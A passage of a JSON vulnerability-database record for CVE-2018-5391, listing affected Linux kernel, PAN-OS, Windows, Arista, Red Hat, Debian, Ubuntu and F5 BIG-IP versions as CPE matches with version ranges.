        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.7"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "8.1.1"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "8.1"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "17090"
      },
      {
        "model": "windows for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "100"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.36"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.8"
      },
      {
        "model": "kernel 3.9-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.90"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.2"
      },
      {
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1016070"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.7"
      },
      {
        "model": "extendible operating system 4.20.0f",
        "scope": null,
        "trust": 0.3,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.1"
      },
      {
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1018030"
      },
      {
        "model": "extendible operating system 4.20.2.1f",
        "scope": null,
        "trust": 0.3,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.6"
      },
      {
        "model": "kernel 4.17-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.1"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.4"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.10"
      },
      {
        "model": "kernel 4.16-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.26"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.13"
      },
      {
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1017030"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1017090"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.10"
      },
      {
        "model": "kernel 4.14-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 4.16-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "105108"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-570"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-5391"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.18",
                "versionStartIncluding": "3.9",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:6.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:6.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1709:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:itanium:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.0.1.1",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.4",
                "versionStartIncluding": "14.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.4",
                "versionStartIncluding": "14.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.4",
                "versionStartIncluding": "14.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.4",
                "versionStartIncluding": "14.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.4",
                "versionStartIncluding": "14.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.4",
                "versionStartIncluding": "14.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.4",
                "versionStartIncluding": "14.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.4",
                "versionStartIncluding": "14.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.4",
                "versionStartIncluding": "14.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.4",
                "versionStartIncluding": "14.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.4",
                "versionStartIncluding": "14.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.4",
                "versionStartIncluding": "14.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "14.1.2.4",
                "versionStartIncluding": "14.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "13.1.3",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
